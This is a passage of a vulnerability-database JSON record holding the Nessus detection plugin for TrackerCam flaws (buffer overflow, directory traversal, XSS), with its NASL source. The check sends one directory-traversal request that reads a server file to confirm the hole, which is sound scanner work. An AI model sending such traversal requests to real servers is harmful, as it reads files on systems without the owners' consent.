"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/trackercam_phparg_overflow.rb"}], "nessus": [{"lastseen": "2021-01-20T15:18:48", "description": "The remote host is running TrackerCam, a HTTP software that allows a\nuser to publish a webcam feed thru a website.\n\nThe remote version of this software is affected by multiple\nvulnerabilities :\n\n - Buffer overflows which may allow an attacker to execute\n arbitrary code on the remote host.\n\n - A directory traversal bug that may allow an attacker to\n read arbitrary files on the remote host with the \n privileges of the web server daemon.\n\n - A cross-site scripting issue that may allow an attacker\n to use the remote host to perform a cross-site 
scripting\n attack.", "edition": 24, "published": "2005-02-21T00:00:00", "title": "TrackerCam Multiple Remote Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0480", "CVE-2005-0479", "CVE-2005-0482", "CVE-2005-0481", "CVE-2005-0478"], "modified": "2005-02-21T00:00:00", "cpe": [], "id": "TRACKERCAM_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/17160", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17160);\n script_version(\"1.18\");\n script_cve_id(\"CVE-2005-0478\", \"CVE-2005-0479\", \"CVE-2005-0480\", \"CVE-2005-0481\", \"CVE-2005-0482\");\n script_bugtraq_id(12592);\n \n script_name(english:\"TrackerCam Multiple Remote Vulnerabilities\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is running TrackerCam, a HTTP software that allows a\nuser to publish a webcam feed thru a website.\n\nThe remote version of this software is affected by multiple\nvulnerabilities :\n\n - Buffer overflows which may allow an attacker to execute\n arbitrary code on the remote host.\n\n - A directory traversal bug that may allow an attacker to\n read arbitrary files on the remote host with the \n privileges of the web server daemon.\n\n - A cross-site scripting issue that may allow an attacker\n to use the remote host to perform a cross-site scripting\n attack.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://www.securityfocus.com/archive/1/390918/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Unknown at this time.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TrackerCam PHP Argument Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/18\");\n\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Checks for flaws in TrackerCam\");\n \n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8090);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8090);\n\nbanner = get_http_banner(port:port);\nif ( \"Server: TrackerCam/\" >!< banner ) exit(0);\n\nw = http_send_recv3(method:\"GET\", item:\"/tuner/ComGetLogFile.php3?fn=../HTTPRoot/tuner/ComGetLogFile.php3\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = strcat(w[0], w[1], '\\r\\n', w[2]);\nif ( \"$fcontents = file ('../../log/'.$fn);\" >< res )\n{\n\tsecurity_hole(port);\n\tset_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}